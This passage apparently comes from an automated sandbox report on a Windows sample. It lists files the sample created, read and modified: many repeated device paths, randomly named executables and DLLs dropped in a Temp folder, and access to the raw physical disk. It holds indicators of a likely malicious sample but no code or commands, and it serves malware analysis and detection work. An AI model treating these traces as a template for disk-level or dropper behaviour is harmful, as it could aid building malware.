\??\dw896
\??\dw1027
\??\dw37
\??\dw8
\??\dw2479
\??\dw995
\??\dw8935
\??\dw795
\??\dw7393
\??\dw9284
\??\dw92388
\??\dw23750
\??\dw79239
\??\dw7924
\??\dw24
\??\dw973
\??\dw284
\??\dw90
\??\ev1025
\??\ev369
\??\ev79
\??\ev24786
\??\ev9946
\??\ev89346
\??\ev7944
\??\ev73925
\??\ev92835
\??\ev923876
\??\ev237493
\??\ev792385
\??\ev79236
\??\ev235
\??\ev9726
\??\ev2835
\??\ev896
\??\ev1027
\??\ev37
\??\ev8
\??\ev2479
\??\ev995
\??\ev8935
\??\ev795
\??\ev7393
\??\ev9284
\??\ev92388
\??\ev23750
\??\ev79239
\??\ev7924
\??\ev24
\??\ev973
\??\ev284
\??\ev90
\??\fu1025
\??\fu369
\??\fu79
\??\fu24786
\??\fu9946
\??\fu89346
\??\fu7944
\??\fu73925
\??\fu92835
\??\fu923876
\??\fu237493
\??\fu792385
\??\fu79236
\??\fu235
\??\fu9726
\??\fu2835
\??\fu896
\??\fu1027
\??\fu37
\??\fu8
\??\fu2479
\??\fu995
\??\fu8935
\??\fu795
\??\fu7393
\??\fu9284
\??\fu92388
\??\fu23750
\??\fu79239
\??\fu7924
\??\fu24
\??\fu973
\??\fu284
\??\fu90
\??\gt1025
\??\gt369
\??\gt79
\??\gt24786
\??\gt9946
\??\gt89346
\??\gt7944
\??\gt73925
\??\gt92835
\??\gt923876
\??\gt237493
\??\gt792385
\??\gt79236
\??\gt235
\??\gt9726
\??\gt2835
\??\gt896
\??\gt1027
\??\gt37
\??\gt8
\??\gt2479
\??\gt995
\??\gt8935
\??\gt795
\??\gt7393
\??\gt9284
\??\gt92388
\??\gt23750
\??\gt79239
\??\gt7924
\??\gt24
\??\gt973
\??\gt284
\??\gt90
\??\hs1025
\??\hs369
\??\hs79
\??\hs24786
\??\hs9946
\??\hs89346
\??\hs7944
\??\hs73925
\??\hs92835
\??\hs923876
\??\hs237493
\??\hs792385
\??\hs79236
\??\hs235
\??\hs9726
\??\hs2835
\??\hs896
\??\hs1027
\??\hs37
\??\hs8
\??\hs2479
\??\hs995
\??\hs8935
\??\hs795
\??\hs7393
\??\hs9284
\??\hs92388
\??\hs23750
\??\hs79239
\??\hs7924
\??\hs24
\??\hs973
\??\hs284
\??\hs90
\??\ir1025
\??\ir369
\??\ir79
\??\ir24786
\??\ir9946
\??\ir89346
\??\ir7944
\??\ir73925
\??\ir92835
\??\ir923876
\??\ir237493
\??\ir792385
\??\ir79236
\??\ir235
\??\ir9726
\??\ir2835
\??\ir896
\??\ir1027
\??\ir37
\??\ir8
\??\ir2479
\??\ir995
\??\ir8935
\??\ir795
\??\ir7393
\??\ir9284
\??\ir92388
\??\ir23750
\??\ir79239
\??\ir7924
\??\ir24
\??\ir973
\??\ir284
\??\ir90
\??\jq1025
\??\jq369
\??\jq79
\??\jq24786
\??\jq9946
\??\jq89346
\??\jq7944
\??\jq73925
\??\jq92835
\??\jq923876
\??\jq237493
\??\jq792385
\??\jq79236
\??\jq235
\??\jq9726
\??\jq2835
\??\jq896
\??\jq1027
\??\jq37
\??\jq8
\??\jq2479
\??\jq995
\??\jq8935
\??\jq795
\??\jq7393
\??\jq9284
\??\jq92388
\??\jq23750
\??\jq79239
\??\jq7924
\??\jq24
\??\jq973
\??\jq284
\??\jq90
\??\kp1025
\??\kp369
\??\kp79
\??\kp24786
\??\kp9946
\??\kp89346
\??\kp7944
\??\kp73925
\??\kp92835
\??\kp923876
\??\kp237493
\??\kp792385
\??\kp79236
\??\kp235
\??\kp9726
\??\kp2835
\??\kp896
\??\kp1027
\??\kp37
\??\kp8
\??\kp2479
\??\kp995
\??\kp8935
\??\kp795
\??\kp7393
\??\kp9284
\??\kp92388
\??\kp23750
\??\kp79239
\??\kp7924
\??\kp24
\??\kp973
\??\kp284
\??\kp90
\??\lo1025
\??\lo369
\??\lo79
\??\lo24786
\??\lo9946
\??\lo89346
\??\lo7944
\??\lo73925
\??\lo92835
\??\lo923876
\??\lo237493
\??\lo792385
\??\lo79236
\??\lo235
\??\lo9726
\??\lo2835
\??\lo896
\??\lo1027
\??\lo37
\??\lo8
\??\lo2479
\??\lo995
\??\lo8935
\??\lo795
\??\lo7393
\??\lo9284
\??\lo92388
\??\lo23750
\??\lo79239
\??\lo7924
\??\lo24
\??\lo973
\??\lo284
\??\lo90
\??\mn1025
\??\mn369
\??\mn79
\??\mn24786
\??\mn9946
\??\mn89346
\??\mn7944
\??\mn73925
\??\mn92835
\??\mn923876
\??\mn237493
\??\mn792385
\??\mn79236
\??\mn235
\??\mn9726
\??\mn2835
\??\mn896
\??\mn1027
\??\mn37
\??\mn8
\??\mn2479
\??\mn995
\??\mn8935
\??\mn795
\??\mn7393
\??\mn9284
\??\mn92388
\??\mn23750
\??\mn79239
\??\mn7924
\??\mn24
\??\mn973
\??\mn284
\??\mn90
\??\nm1025
\??\nm369
\??\nm79
\??\nm24786
\??\nm9946
\??\nm89346
\??\nm7944
\??\nm73925
\??\nm92835
\??\nm923876
\??\nm237493
\??\nm792385
\??\nm79236
\??\nm235
\??\nm9726
\??\nm2835
\??\nm896
\??\nm1027
\??\nm37
\??\nm8
\??\nm2479
\??\nm995
\??\nm8935
\??\nm795
\??\nm7393
\??\nm9284
\??\nm92388
\??\nm23750
\??\nm79239
\??\nm7924
\??\nm24
\??\nm973
\??\nm284
\??\nm90
\??\ol1025
\??\ol369
\??\ol79
\??\ol24786
\??\ol9946
\??\ol89346
\??\ol7944
\??\ol73925
\??\ol92835
\??\ol923876
\??\ol237493
\??\ol792385
\??\ol79236
\??\ol235
\??\ol9726
\??\ol2835
\??\ol896
\??\ol1027
\??\ol37
\??\ol8
\??\ol2479
\??\ol995
\??\ol8935
\??\ol795
\??\ol7393
\??\ol9284
\??\ol92388
\??\ol23750
\??\ol79239
\??\ol7924
\??\ol24
\??\ol973
\??\ol284
\??\ol90
\??\pk1025
\??\pk369
\??\pk79
\??\pk24786
\??\pk9946
\??\pk89346
\??\pk7944
\??\pk73925
\??\pk92835
\??\pk923876
\??\pk237493
\??\pk792385
\??\pk79236
\??\pk235
\??\pk9726
\??\pk2835
\??\pk896
\??\pk1027
\??\pk37
\??\pk8
\??\pk2479
\??\pk995
\??\pk8935
\??\pk795
\??\pk7393
\??\pk9284
\??\pk92388
\??\pk23750
\??\pk79239
\??\pk7924
\??\pk24
\??\pk973
\??\pk284
\??\pk90
\??\qj1025
\??\qj369
\??\qj79
\??\qj24786
\??\qj9946
\??\qj89346
\??\qj7944
\??\qj73925
\??\qj92835
\??\qj923876
\??\qj237493
\??\qj792385
\??\qj79236
\??\qj235
\??\qj9726
\??\qj2835
\??\qj896
\??\qj1027
\??\qj37
\??\qj8
\??\qj2479
\??\qj995
\??\qj8935
\??\qj795
\??\qj7393
\??\qj9284
\??\qj92388
\??\qj23750
\??\qj79239
\??\qj7924
\??\qj24
\??\qj973
\??\qj284
\??\qj90
\??\ri1025
\??\ri369
\??\ri79
\??\ri24786
\??\ri9946
\??\ri89346
\??\ri7944
\??\ri73925
\??\ri92835
\??\ri923876
\??\ri237493
\??\ri792385
\??\ri79236
\??\ri235
\??\ri9726
\??\ri2835
\??\ri896
\??\ri1027
\??\ri37
\??\ri8
\??\ri2479
\??\ri995
\??\ri8935
\??\ri795
\??\ri7393
\??\ri9284
\??\ri92388
\??\ri23750
\??\ri79239
\??\ri7924
\??\ri24
\??\ri973
\??\ri284
\??\ri90
\??\sh1025
\??\sh369
\??\sh79
\??\sh24786
\??\sh9946
\??\sh89346
\??\sh7944
\??\sh73925
\??\sh92835
\??\sh923876
\??\sh237493
\??\sh792385
\??\sh79236
\??\sh235
\??\sh9726
\??\sh2835
\??\sh896
\??\sh1027
\??\sh37
\??\sh8
\??\sh2479
\??\sh995
\??\sh8935
\??\sh795
\??\sh7393
\??\sh9284
\??\sh92388
\??\sh23750
\??\sh79239
\??\sh7924
\??\sh24
\??\sh973
\??\sh284
\??\sh90
\??\tg1025
\??\tg369
\??\tg79
\??\tg24786
\??\tg9946
\??\tg89346
\??\tg7944
\??\tg73925
\??\tg92835
\??\tg923876
\??\tg237493
\??\tg792385
\??\tg79236
\??\tg235
\??\tg9726
\??\tg2835
\??\tg896
\??\tg1027
\??\tg37
\??\tg8
\??\tg2479
\??\tg995
\??\tg8935
\??\tg795
\??\tg7393
\??\tg9284
\??\tg92388
\??\tg23750
\??\tg79239
\??\tg7924
\??\tg24
\??\tg973
\??\tg284
\??\tg90
\??\uf1025
\??\uf369
\??\uf79
\??\uf24786
\??\uf9946
\??\uf89346
\??\uf7944
\??\uf73925
\??\uf92835
\??\uf923876
\??\uf237493
\??\uf792385
\??\uf79236
\??\uf235
\??\uf9726
\??\uf2835
\??\uf896
\??\uf1027
\??\uf37
\??\uf8
\??\uf2479
\??\uf995
\??\uf8935
\??\uf795
\??\uf7393
\??\uf9284
\??\uf92388
\??\uf23750
\??\uf79239
\??\uf7924
\??\uf24
\??\uf973
\??\uf284
\??\uf90
\??\ve1025
\??\ve369
\??\ve79
\??\ve24786
\??\ve9946
\??\ve89346
\??\ve7944
\??\ve73925
\??\ve92835
\??\ve923876
\??\ve237493
\??\ve792385
\??\ve79236
\??\ve235
\??\ve9726
\??\ve2835
\??\ve896
\??\ve1027
\??\ve37
\??\ve8
\??\ve2479
\??\ve995
\??\ve8935
\??\ve795
\??\ve7393
\??\ve9284
\??\ve92388
\??\ve23750
\??\ve79239
\??\ve7924
\??\ve24
\??\ve973
\??\ve284
\??\ve90
\??\wd1025
\??\wd369
\??\wd79
\??\wd24786
\??\wd9946
\??\wd89346
\??\wd7944
\??\wd73925
\??\wd92835
\??\wd923876
\??\wd237493
\??\wd792385
\??\wd79236
\??\wd235
\??\wd9726
\??\wd2835
\??\wd896
\??\wd1027
\??\wd37
\??\wd8
\??\wd2479
\??\wd995
\??\wd8935
\??\wd795
\??\wd7393
\??\wd9284
\??\wd92388
\??\wd23750
\??\wd79239
\??\wd7924
\??\wd24
\??\wd973
\??\wd284
\??\wd90
\??\xc1025
\??\xc369
\??\xc79
\??\xc24786
\??\xc9946
\??\xc89346
\??\xc7944
\??\xc73925
\??\xc92835
\??\xc923876
\??\xc237493
\??\xc792385
\??\xc79236
\??\xc235
\??\xc9726
\??\xc2835
\??\xc896
\??\xc1027
\??\xc37
\??\xc8
\??\xc2479
\??\xc995
\??\xc8935
\??\xc795
\??\xc7393
\??\xc9284
\??\xc92388
\??\xc23750
\??\xc79239
\??\xc7924
\??\xc24
\??\xc973
\??\xc284
\??\xc90
\??\yb1025
\??\yb369
\??\yb79
\??\yb24786
\??\yb9946
\??\yb89346
\??\yb7944
\??\yb73925
\??\yb92835
\??\yb923876
\??\yb237493
\??\yb792385
\??\yb79236
\??\yb235
\??\yb9726
\??\yb2835
\??\yb896
\??\yb1027
\??\yb37
\??\yb8
\??\yb2479
\??\yb995
\??\yb8935
\??\yb795
\??\yb7393
\??\yb9284
\??\yb92388
\??\yb23750
\??\yb79239
\??\yb7924
\??\yb24
\??\yb973
\??\yb284
\??\yb90
C:\Windows\System32\ntdll.dll
C:\Users\test\AppData\Local\Temp\User32.dll
C:\Users\test\AppData\Local\Temp\sf.dll.2.Manifest
C:\Users\test\AppData\Local\Temp\sf.dll.3.Manifest
C:\Users\test\AppData\Local\Temp\sf.dll.Manifest
C:\Windows\SysWOW64\stdole2.tlb
C:\Users\test\AppData\Local\Temp\BBBgCd.exe
C:\Users\test\AppData\Local\Temp\advapi32.dll
C:\Users\test\AppData\Local\Temp\user32.dll
C:\Users\test\AppData\Local\Temp\[a2e9afd70f14ddde426db28e8048a8ad]
C:\Users\test\AppData\Local\Temp\[616962b526b69b6b1547ae7e36c88d95]
C:\Users\test\AppData\Local\Temp\dZvTwB.exe
\??\PhysicalDrive0
C:\Users\test\AppData\Local\Temp\user32.DLL

读取的文件

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Fonts\staticcache.dat
C:\Users\test\AppData\Local\Temp\DmReg.dll
C:\Windows\System32\mfc42u.dll
C:\Windows\System32\odbc32.dll
C:\Windows\System32\msvcp60.dll
C:\Users\test\AppData\Local\Temp\sf.dll
\??\az1025
\??\az369
\??\az79
\??\az24786
\??\az9946
\??\az89346
\??\az7944
\??\az73925
\??\az92835
\??\az923876
\??\az237493
\??\az792385
\??\az79236
\??\az235
\??\az9726
\??\az2835
\??\az896
\??\az1027
\??\az37
\??\az8
\??\az2479
\??\az995
\??\az8935
\??\az795
\??\az7393
\??\az9284
\??\az92388
\??\az23750
\??\az79239
\??\az7924
\??\az24
\??\az973
\??\az284
\??\az90
\??\by1025
\??\by369
\??\by79
\??\by24786
\??\by9946
\??\by89346
\??\by7944
\??\by73925
\??\by92835
\??\by923876
\??\by237493
\??\by792385
\??\by79236
\??\by235
\??\by9726
\??\by2835
\??\by896
\??\by1027
\??\by37
\??\by8
\??\by2479
\??\by995
\??\by8935
\??\by795
\??\by7393
\??\by9284
\??\by92388
\??\by23750
\??\by79239
\??\by7924
\??\by24
\??\by973
\??\by284
\??\by90
\??\cx1025
\??\cx369
\??\cx79
\??\cx24786
\??\cx9946
\??\cx89346
\??\cx7944
\??\cx73925
\??\cx92835
\??\cx923876
\??\cx237493
\??\cx792385
\??\cx79236
\??\cx235
\??\cx9726
\??\cx2835
\??\cx896
\??\cx1027
\??\cx37
\??\cx8
\??\cx2479
\??\cx995
\??\cx8935
\??\cx795
\??\cx7393
\??\cx9284
\??\cx92388
\??\cx23750
\??\cx79239
\??\cx7924
\??\cx24
\??\cx973
\??\cx284
\??\cx90
\??\dw1025
\??\dw369
\??\dw79
\??\dw24786
\??\dw9946
\??\dw89346
\??\dw7944
\??\dw73925
\??\dw92835
\??\dw923876
\??\dw237493
\??\dw792385
\??\dw79236
\??\dw235
\??\dw9726
\??\dw2835
\??\dw896
\??\dw1027
\??\dw37
\??\dw8
\??\dw2479
\??\dw995
\??\dw8935
\??\dw795
\??\dw7393
\??\dw9284
\??\dw92388
\??\dw23750
\??\dw79239
\??\dw7924
\??\dw24
\??\dw973
\??\dw284
\??\dw90
\??\ev1025
\??\ev369
\??\ev79
\??\ev24786
\??\ev9946
\??\ev89346
\??\ev7944
\??\ev73925
\??\ev92835
\??\ev923876
\??\ev237493
\??\ev792385
\??\ev79236
\??\ev235
\??\ev9726
\??\ev2835
\??\ev896
\??\ev1027
\??\ev37
\??\ev8
\??\ev2479
\??\ev995
\??\ev8935
\??\ev795
\??\ev7393
\??\ev9284
\??\ev92388
\??\ev23750
\??\ev79239
\??\ev7924
\??\ev24
\??\ev973
\??\ev284
\??\ev90
\??\fu1025
\??\fu369
\??\fu79
\??\fu24786
\??\fu9946
\??\fu89346
\??\fu7944
\??\fu73925
\??\fu92835
\??\fu923876
\??\fu237493
\??\fu792385
\??\fu79236
\??\fu235
\??\fu9726
\??\fu2835
\??\fu896
\??\fu1027
\??\fu37
\??\fu8
\??\fu2479
\??\fu995
\??\fu8935
\??\fu795
\??\fu7393
\??\fu9284
\??\fu92388
\??\fu23750
\??\fu79239
\??\fu7924
\??\fu24
\??\fu973
\??\fu284
\??\fu90
\??\gt1025
\??\gt369
\??\gt79
\??\gt24786
\??\gt9946
\??\gt89346
\??\gt7944
\??\gt73925
\??\gt92835
\??\gt923876
\??\gt237493
\??\gt792385
\??\gt79236
\??\gt235
\??\gt9726
\??\gt2835
\??\gt896
\??\gt1027
\??\gt37
\??\gt8
\??\gt2479
\??\gt995
\??\gt8935
\??\gt795
\??\gt7393
\??\gt9284
\??\gt92388
\??\gt23750
\??\gt79239
\??\gt7924
\??\gt24
\??\gt973
\??\gt284
\??\gt90
\??\hs1025
\??\hs369
\??\hs79
\??\hs24786
\??\hs9946
\??\hs89346
\??\hs7944
\??\hs73925
\??\hs92835
\??\hs923876
\??\hs237493
\??\hs792385
\??\hs79236
\??\hs235
\??\hs9726
\??\hs2835
\??\hs896
\??\hs1027
\??\hs37
\??\hs8
\??\hs2479
\??\hs995
\??\hs8935
\??\hs795
\??\hs7393
\??\hs9284
\??\hs92388
\??\hs23750
\??\hs79239
\??\hs7924
\??\hs24
\??\hs973
\??\hs284
\??\hs90
\??\ir1025
\??\ir369
\??\ir79
\??\ir24786
\??\ir9946
\??\ir89346
\??\ir7944
\??\ir73925
\??\ir92835
\??\ir923876
\??\ir237493
\??\ir792385
\??\ir79236
\??\ir235
\??\ir9726
\??\ir2835
\??\ir896
\??\ir1027
\??\ir37
\??\ir8
\??\ir2479
\??\ir995
\??\ir8935
\??\ir795
\??\ir7393
\??\ir9284
\??\ir92388
\??\ir23750
\??\ir79239
\??\ir7924
\??\ir24
\??\ir973
\??\ir284
\??\ir90
\??\jq1025
\??\jq369
\??\jq79
\??\jq24786
\??\jq9946
\??\jq89346
\??\jq7944
\??\jq73925
\??\jq92835
\??\jq923876
\??\jq237493
\??\jq792385
\??\jq79236
\??\jq235
\??\jq9726
\??\jq2835
\??\jq896
\??\jq1027
\??\jq37
\??\jq8
\??\jq2479
\??\jq995
\??\jq8935
\??\jq795
\??\jq7393
\??\jq9284
\??\jq92388
\??\jq23750
\??\jq79239
\??\jq7924
\??\jq24
\??\jq973
\??\jq284
\??\jq90
\??\kp1025
\??\kp369
\??\kp79
\??\kp24786
\??\kp9946
\??\kp89346
\??\kp7944
\??\kp73925
\??\kp92835
\??\kp923876
\??\kp237493
\??\kp792385
\??\kp79236
\??\kp235
\??\kp9726
\??\kp2835
\??\kp896
\??\kp1027
\??\kp37
\??\kp8
\??\kp2479
\??\kp995
\??\kp8935
\??\kp795
\??\kp7393
\??\kp9284
\??\kp92388
\??\kp23750
\??\kp79239
\??\kp7924
\??\kp24
\??\kp973
\??\kp284
\??\kp90
\??\lo1025
\??\lo369
\??\lo79
\??\lo24786
\??\lo9946
\??\lo89346
\??\lo7944
\??\lo73925
\??\lo92835
\??\lo923876
\??\lo237493
\??\lo792385
\??\lo79236
\??\lo235
\??\lo9726
\??\lo2835
\??\lo896
\??\lo1027
\??\lo37
\??\lo8
\??\lo2479
\??\lo995
\??\lo8935
\??\lo795
\??\lo7393
\??\lo9284
\??\lo92388
\??\lo23750
\??\lo79239
\??\lo7924
\??\lo24
\??\lo973
\??\lo284
\??\lo90
\??\mn1025
\??\mn369
\??\mn79
\??\mn24786
\??\mn9946
\??\mn89346
\??\mn7944
\??\mn73925
\??\mn92835
\??\mn923876
\??\mn237493
\??\mn792385
\??\mn79236
\??\mn235
\??\mn9726
\??\mn2835
\??\mn896
\??\mn1027
\??\mn37
\??\mn8
\??\mn2479
\??\mn995
\??\mn8935
\??\mn795
\??\mn7393
\??\mn9284
\??\mn92388
\??\mn23750
\??\mn79239
\??\mn7924
\??\mn24
\??\mn973
\??\mn284
\??\mn90
\??\nm1025
\??\nm369
\??\nm79
\??\nm24786
\??\nm9946
\??\nm89346
\??\nm7944
\??\nm73925
\??\nm92835
\??\nm923876
\??\nm237493
\??\nm792385
\??\nm79236
\??\nm235
\??\nm9726
\??\nm2835
\??\nm896
\??\nm1027
\??\nm37
\??\nm8
\??\nm2479
\??\nm995
\??\nm8935
\??\nm795
\??\nm7393
\??\nm9284
\??\nm92388
\??\nm23750
\??\nm79239
\??\nm7924
\??\nm24
\??\nm973
\??\nm284
\??\nm90
\??\ol1025
\??\ol369
\??\ol79
\??\ol24786
\??\ol9946
\??\ol89346
\??\ol7944
\??\ol73925
\??\ol92835
\??\ol923876
\??\ol237493
\??\ol792385
\??\ol79236
\??\ol235
\??\ol9726
\??\ol2835
\??\ol896
\??\ol1027
\??\ol37
\??\ol8
\??\ol2479
\??\ol995
\??\ol8935
\??\ol795
\??\ol7393
\??\ol9284
\??\ol92388
\??\ol23750
\??\ol79239
\??\ol7924
\??\ol24
\??\ol973
\??\ol284
\??\ol90
\??\pk1025
\??\pk369
\??\pk79
\??\pk24786
\??\pk9946
\??\pk89346
\??\pk7944
\??\pk73925
\??\pk92835
\??\pk923876
\??\pk237493
\??\pk792385
\??\pk79236
\??\pk235
\??\pk9726
\??\pk2835
\??\pk896
\??\pk1027
\??\pk37
\??\pk8
\??\pk2479
\??\pk995
\??\pk8935
\??\pk795
\??\pk7393
\??\pk9284
\??\pk92388
\??\pk23750
\??\pk79239
\??\pk7924
\??\pk24
\??\pk973
\??\pk284
\??\pk90
\??\qj1025
\??\qj369
\??\qj79
\??\qj24786
\??\qj9946
\??\qj89346
\??\qj7944
\??\qj73925
\??\qj92835
\??\qj923876
\??\qj237493
\??\qj792385
\??\qj79236
\??\qj235
\??\qj9726
\??\qj2835
\??\qj896
\??\qj1027
\??\qj37
\??\qj8
\??\qj2479
\??\qj995
\??\qj8935
\??\qj795
\??\qj7393
\??\qj9284
\??\qj92388
\??\qj23750
\??\qj79239
\??\qj7924
\??\qj24
\??\qj973
\??\qj284
\??\qj90
\??\ri1025
\??\ri369
\??\ri79
\??\ri24786
\??\ri9946
\??\ri89346
\??\ri7944
\??\ri73925
\??\ri92835
\??\ri923876
\??\ri237493
\??\ri792385
\??\ri79236
\??\ri235
\??\ri9726
\??\ri2835
\??\ri896
\??\ri1027
\??\ri37
\??\ri8
\??\ri2479
\??\ri995
\??\ri8935
\??\ri795
\??\ri7393
\??\ri9284
\??\ri92388
\??\ri23750
\??\ri79239
\??\ri7924
\??\ri24
\??\ri973
\??\ri284
\??\ri90
\??\sh1025
\??\sh369
\??\sh79
\??\sh24786
\??\sh9946
\??\sh89346
\??\sh7944
\??\sh73925
\??\sh92835
\??\sh923876
\??\sh237493
\??\sh792385
\??\sh79236
\??\sh235
\??\sh9726
\??\sh2835
\??\sh896
\??\sh1027
\??\sh37
\??\sh8
\??\sh2479
\??\sh995
\??\sh8935
\??\sh795
\??\sh7393
\??\sh9284
\??\sh92388
\??\sh23750
\??\sh79239
\??\sh7924
\??\sh24
\??\sh973
\??\sh284
\??\sh90
\??\tg1025
\??\tg369
\??\tg79
\??\tg24786
\??\tg9946
\??\tg89346
\??\tg7944
\??\tg73925
\??\tg92835
\??\tg923876
\??\tg237493
\??\tg792385
\??\tg79236
\??\tg235
\??\tg9726
\??\tg2835
\??\tg896
\??\tg1027
\??\tg37
\??\tg8
\??\tg2479
\??\tg995
\??\tg8935
\??\tg795
\??\tg7393
\??\tg9284
\??\tg92388
\??\tg23750
\??\tg79239
\??\tg7924
\??\tg24
\??\tg973
\??\tg284
\??\tg90
\??\uf1025
\??\uf369
\??\uf79
\??\uf24786
\??\uf9946
\??\uf89346
\??\uf7944
\??\uf73925
\??\uf92835
\??\uf923876
\??\uf237493
\??\uf792385
\??\uf79236
\??\uf235
\??\uf9726
\??\uf2835
\??\uf896
\??\uf1027
\??\uf37
\??\uf8
\??\uf2479
\??\uf995
\??\uf8935
\??\uf795
\??\uf7393
\??\uf9284
\??\uf92388
\??\uf23750
\??\uf79239
\??\uf7924
\??\uf24
\??\uf973
\??\uf284
\??\uf90
\??\ve1025
\??\ve369
\??\ve79
\??\ve24786
\??\ve9946
\??\ve89346
\??\ve7944
\??\ve73925
\??\ve92835
\??\ve923876
\??\ve237493
\??\ve792385
\??\ve79236
\??\ve235
\??\ve9726
\??\ve2835
\??\ve896
\??\ve1027
\??\ve37
\??\ve8
\??\ve2479
\??\ve995
\??\ve8935
\??\ve795
\??\ve7393
\??\ve9284
\??\ve92388
\??\ve23750
\??\ve79239
\??\ve7924
\??\ve24
\??\ve973
\??\ve284
\??\ve90
\??\wd1025
\??\wd369
\??\wd79
\??\wd24786
\??\wd9946
\??\wd89346
\??\wd7944
\??\wd73925
\??\wd92835
\??\wd923876
\??\wd237493
\??\wd792385
\??\wd79236
\??\wd235
\??\wd9726
\??\wd2835
\??\wd896
\??\wd1027
\??\wd37
\??\wd8
\??\wd2479
\??\wd995
\??\wd8935
\??\wd795
\??\wd7393
\??\wd9284
\??\wd92388
\??\wd23750
\??\wd79239
\??\wd7924
\??\wd24
\??\wd973
\??\wd284
\??\wd90
\??\xc1025
\??\xc369
\??\xc79
\??\xc24786
\??\xc9946
\??\xc89346
\??\xc7944
\??\xc73925
\??\xc92835
\??\xc923876
\??\xc237493
\??\xc792385
\??\xc79236
\??\xc235
\??\xc9726
\??\xc2835
\??\xc896
\??\xc1027
\??\xc37
\??\xc8
\??\xc2479
\??\xc995
\??\xc8935
\??\xc795
\??\xc7393
\??\xc9284
\??\xc92388
\??\xc23750
\??\xc79239
\??\xc7924
\??\xc24
\??\xc973
\??\xc284
\??\xc90
\??\yb1025
\??\yb369
\??\yb79
\??\yb24786
\??\yb9946
\??\yb89346
\??\yb7944
\??\yb73925
\??\yb92835
\??\yb923876
\??\yb237493
\??\yb792385
\??\yb79236
\??\yb235
\??\yb9726
\??\yb2835
\??\yb896
\??\yb1027
\??\yb37
\??\yb8
\??\yb2479
\??\yb995
\??\yb8935
\??\yb795
\??\yb7393
\??\yb9284
\??\yb92388
\??\yb23750
\??\yb79239
\??\yb7924
\??\yb24
\??\yb973
\??\yb284
\??\yb90
C:\Windows\System32\ntdll.dll
C:\Users\test\AppData\Local\Temp\sf.dll.2.Manifest
C:\Users\test\AppData\Local\Temp\sf.dll.3.Manifest
C:\Users\test\AppData\Local\Temp\sf.dll.Manifest
C:\Windows\SysWOW64\stdole2.tlb
C:\Users\test\AppData\Local\Temp\BBBgCd.exe
\??\PhysicalDrive0

修改的文件

C:\Users\test\AppData\Local\Temp\sf.dll
C:\Users\test\AppData\Local\Temp\DmReg.dll
\??\az1025
\??\az369
\??\az79
\??\az24786
\??\az9946
\??\az89346
\??\az7944
\??\az73925
\??\az92835
\??\az923876
\??\az237493
\??\az792385
\??\az79236
\??\az235
\??\az9726
\??\az2835
\??\az896
\??\az1027
\??\az37
\??\az8
\??\az2479
\??\az995
\??\az8935
\??\az795
\??\az7393
\??\az9284
\??\az92388
\??\az23750
\??\az79239
\??\az7924
\??\az24
\??\az973
\??\az284
\??\az90
\??\by1025
\??\by369
\??\by79
\??\by24786
\??\by9946
\??\by89346
\??\by7944
\??\by73925
\??\by92835
\??\by923876
\??\by237493
\??\by792385
\??\by79236
\??\by235
\??\by9726
\??\by2835
\??\by896
\??\by1027
\??\by37
\??\by8
\??\by2479
\??\by995
\??\by8935
\??\by795
\??\by7393
\??\by9284
\??\by92388
\??\by23750
\??\by79239
\??\by7924
\??\by24
\??\by973
\??\by284
\??\by90
\??\cx1025
\??\cx369
\??\cx79
\??\cx24786
\??\cx9946
\??\cx89346
\??\cx7944
\??\cx73925
\??\cx92835
\??\cx923876
\??\cx237493
\??\cx792385
\??\cx79236
\??\cx235
\??\cx9726
\??\cx2835
\??\cx896
\??\cx1027
\??\cx37
\??\cx8
\??\cx2479
\??\cx995
\??\cx8935
\??\cx795
\??\cx7393
\??\cx9284
\??\cx92388
\??\cx23750
\??\cx79239
\??\cx7924
\??\cx24
\??\cx973
\??\cx284
\??\cx90
\??\dw1025
\??\dw369
\??\dw79
\??\dw24786
\??\dw9946
\??\dw89346
\??\dw7944
\??\dw73925
\??\dw92835
\??\dw923876
\??\dw237493
\??\dw792385
\??\dw79236
\??\dw235
\??\dw9726
\??\dw2835
\??\dw896
\??\dw1027
\??\dw37
\??\dw8
\??\dw2479
\??\dw995
\??\dw8935
\??\dw795
\??\dw7393
\??\dw9284
\??\dw92388
\??\dw23750
\??\dw79239
\??\dw7924
\??\dw24
\??\dw973
\??\dw284
\??\dw90
\??\ev1025
\??\ev369
\??\ev79
\??\ev24786
\??\ev9946
\??\ev89346
\??\ev7944
\??\ev73925
\??\ev92835
\??\ev923876
\??\ev237493
\??\ev792385
\??\ev79236
\??\ev235
\??\ev9726
\??\ev2835
\??\ev896
\??\ev1027
\??\ev37
\??\ev8
\??\ev2479
\??\ev995
\??\ev8935
\??\ev795
\??\ev7393
\??\ev9284
\??\ev92388
\??\ev23750
\??\ev79239
\??\ev7924
\??\ev24
\??\ev973
\??\ev284
\??\ev90
\??\fu1025
\??\fu369
\??\fu79
\??\fu24786
\??\fu9946
\??\fu89346
\??\fu7944
\??\fu73925
\??\fu92835
\??\fu923876
\??\fu237493
\??\fu792385
\??\fu79236
\??\fu235
\??\fu9726
\??\fu2835
\??\fu896
\??\fu1027
\??\fu37
\??\fu8
\??\fu2479
\??\fu995
\??\fu8935
\??\fu795
\??\fu7393
\??\fu9284
\??\fu92388
\??\fu23750
\??\fu79239
\??\fu7924
\??\fu24
\??\fu973
\??\fu284
\??\fu90
\??\gt1025
\??\gt369
\??\gt79
\??\gt24786
\??\gt9946
\??\gt89346
\??\gt7944
\??\gt73925
\??\gt92835
\??\gt923876
\??\gt237493
\??\gt792385
\??\gt79236
\??\gt235
\??\gt9726
\??\gt2835
\??\gt896
\??\gt1027
\??\gt37
\??\gt8
\??\gt2479
\??\gt995
\??\gt8935
\??\gt795
\??\gt7393
\??\gt9284
\??\gt92388
\??\gt23750
\??\gt79239
\??\gt7924
\??\gt24
\??\gt973
\??\gt284
\??\gt90
\??\hs1025
\??\hs369
\??\hs79
\??\hs24786
\??\hs9946
\??\hs89346
\??\hs7944
\??\hs73925
\??\hs92835
\??\hs923876
\??\hs237493
\??\hs792385
\??\hs79236
\??\hs235
\??\hs9726
\??\hs2835
\??\hs896
\??\hs1027
\??\hs37
\??\hs8
\??\hs2479
\??\hs995
\??\hs8935
\??\hs795
\??\hs7393
\??\hs9284
\??\hs92388
\??\hs23750
\??\hs79239
\??\hs7924
\??\hs24
\??\hs973
\??\hs284
\??\hs90
\??\ir1025
\??\ir369
\??\ir79
\??\ir24786
\??\ir9946
\??\ir89346
\??\ir7944
\??\ir73925
\??\ir92835
\??\ir923876
\??\ir237493
\??\ir792385
\??\ir79236
\??\ir235
\??\ir9726
\??\ir2835
\??\ir896
\??\ir1027
\??\ir37
\??\ir8
\??\ir2479
\??\ir995
